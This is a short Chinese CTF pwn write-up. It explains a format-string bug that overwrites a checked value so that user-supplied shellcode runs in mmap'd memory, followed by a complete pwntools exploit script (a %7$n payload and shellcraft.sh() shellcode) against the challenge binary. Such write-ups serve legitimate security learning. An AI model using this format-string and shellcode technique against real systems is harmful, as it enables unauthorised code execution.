最后修改于2023年9月4日
main函数中直接打印了v4的地址
在函数sub_400BB9中,存在格式化字符串漏洞
在函数sub_400CA6中,*a1其实就是最开始的v4,如果v41==v42 ,就会执行输入的字节码。mmap函数开辟内存空间后将指针传递给v1,
((void (__fastcall *)(_QWORD))v1)(0LL)这段代码将v1转换为一个==函数指针==
综上,只要是v41 = v42 即可执行shellcode从而getshell。
在sub_400BB9函数中存在格式化字符串漏洞,且在最开始会打印出v4的地址,因此在sub_400BB9中Give me an address时,可以输入v4的地址,然后通过格式化字符串漏洞进行修改。
from pwn import*
# from ctypes import*
# libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
context(arch= 'amd64', os='linux', log_level='debug')
# sh = remote("61.147.171.105", 59440)
sh = process('./1d3c852354df4609bf8e56fe8e9df316')
sys_addr = 0x804855A
sh.recvuntil("secret[0] is ")
addr = int(sh.recvuntil("\n")[:-1], 16)
print(addr)
sh.sendlineafter("What should your character's name be:", b'aaa')
sh.sendlineafter("So, where you will go?east or up?:", b"east")
sh.sendlineafter("go into there(1), or leave(0)?:", b'1')
sh.sendlineafter("'Give me an address'", str(addr))
payload = b'a' * 85 + b'%7$n'
sh.sendlineafter("And, you wish is:", payload)
# shellcode = '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
shellcode = asm(shellcraft.sh())
sh.sendlineafter("USE YOU SPELL", shellcode)
# gdb.attach(sh)
# pause()
sh.interactive()
